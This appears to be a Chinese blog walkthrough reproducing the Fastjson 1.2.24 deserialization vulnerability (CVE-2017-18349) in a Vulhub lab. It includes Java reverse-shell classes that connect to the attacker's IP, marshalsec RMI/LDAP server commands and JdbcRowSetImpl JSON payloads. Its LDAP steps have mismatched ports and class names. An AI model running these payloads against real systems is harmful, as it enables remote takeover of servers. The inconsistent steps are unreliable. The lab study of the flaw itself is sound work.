- 1RabbitMQ-->冰解的破><[error] Error when reading /var/lib/rabbitmq/.erlang.cookie: eacces_[error] error when reading .erlang.cookie: eacces
- 2【Rust光年纪】Rust语言实用库汇总:从机器翻译到全文搜索引擎
- 3MuJoCo 入门教程(三)Python 绑定_mujoco.mjmodel
- 4论文笔记:联邦学习——Federated Learning: Challenges, Methods, and Future Directions
- 5解决Xcode中模拟器列表为空添加模拟器也不行的问题
- 62024年安卓最新我的MVVM 开源小项目已发布~,阿里技术面试题_android mvvm开源项目
- 7《C/C++数据结构与算法》第三讲——平衡树_c++平衡树
- 8LoRA训练环境Kohya-ss的排障记录_module 'diffusers.models.attention' has no attribu
- 9渗透中Windows利用Certutil进行文件下载_利用certutil下载可执行文件
- 10LivePortrait 数字人:开源的图生视频模型,本地部署和专业视频制作详细教程_liveportrait s
【反序列化】FastJson1.2.24 反序列化漏洞解析(CVE-2017-18349)_fastjson1.2.24反序列化
赞
踩
基于Vulhub平台完整复现+CVE-2017-18349复现+注意事项
编号:CVE-2017-18349
Fastjson是什么?
fastjson 是一个 有阿里开发的一个开源Java 类库,可以将 Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)
fastjson反序列化漏洞原理?
使用AutoType功能进行序列号的JSON字符会带有一个@type来标记其字符的原始类型,在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。
靶场搭建
Ubuntu靶场环境:IP地址:192.168.200.47
KALI的攻击机IP地址:192.168.200.14
启动环境
docker-compose up –d
- 1
docker ps查看对应的容器端口号,端口为8090
docker ps
- 1
浏览器访问虚拟机ip:8090
漏洞复现(漏洞利用)
为了能成功的利用fastjson1.2.24反序列化漏洞,需要提前在Ubuntu虚拟机上搭建Web服务和RMI服务,通过windows 10物理机向fastjson服务器POST提交Poc后,使得靶机访问远程RMI服务,随后RMI将请求重定向到Web服务器后存放在Web服务器中的恶意Java代码(已编辑的反序列化类),从而成功实现远程命令执行。
JDNI有两个服务:分别是RMI和LDAP
利用RMI协议
在vulhub下的fastjson 1.2.24文件夹下保存以下代码为TouchFile.java文件
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile{
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.200.14/7777 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
编译
javac TouchFile.java
- 1
在class文件所在的目录,Python起一个WEB服务。用8000端口进行访问
python -m http.server 8000
- 1
开启的服务商会出现相应的请求记录
使用marshalsec项目,启动RMI服务,监听9999端口并加载远程类TouchFile.class:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.200.14:8000/#TouchFile" 9999
- 1
刷新靶场(http://192.168.200.47:8090)链接,抓包后改GET包为POST包,在发送的请求数据包中输入以下payload
然后发送到重发器中
报500错误样式
构造的payload:
Content-Type: application/json
Content-Length: 139
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.200.14:9999/TouchFile",
"autoCommit":true
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
点击go
此时RMI监听效果,同时要开启监听
此时,不断的重发包接收到反弹shell,到此漏洞利用完成
利用LDAP协议
一样的做法,不过温馨提示:注意细节!!
在vulhub下的fastjson 1.2.24文件夹下保存以下代码为Getshell.java文件
// javac GetShell.java
import java.lang.Runtime;
import java.lang.Process;
public class Getshell {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.200.14/8888 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
编译
javac Getshell.java
- 1
在class文件所在的目录,Python起一个http服务。用8000端口进行访问
python -m http.server 9999
- 1
使用marshalsec项目,启动RMI服务,监听9999端口并加载远程类TouchFile.class:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.200.14:9000/#TouchFile"6666
- 1
刷新靶场(http://192.168.200.47:8090)链接,抓包后改GET包为POST包,在发送的请求数据包中输入以下payload
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.200.14:6666/GetShell",
"autoCommit":true
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
此时RMI监听效果,同时要开启监听,以使反弹shell能够接收的到
点击GO
很快,监听器就会收到请求,之后,反弹shell就会成功
至此复现完毕
总结:
复现过程中,我也出现很多很问题,实在想敲一敲自己的粗心大意的脑瓜,这东西真是一点问题都不能出现,细心做、按部就班的来着实是复现漏洞成功的首要因素,话说回来,例如,反弹shell接收不到,报了500错误一点反应没有,在网上查找文章说是java版本问题,切换之后的却实现了。
复现不是最终目的,能理解原理,并且能够最终复现成功对于掌握此漏洞算是锦上添花。
参考文章:https://blog.csdn.net/weixin_42282189/article/details/120258118
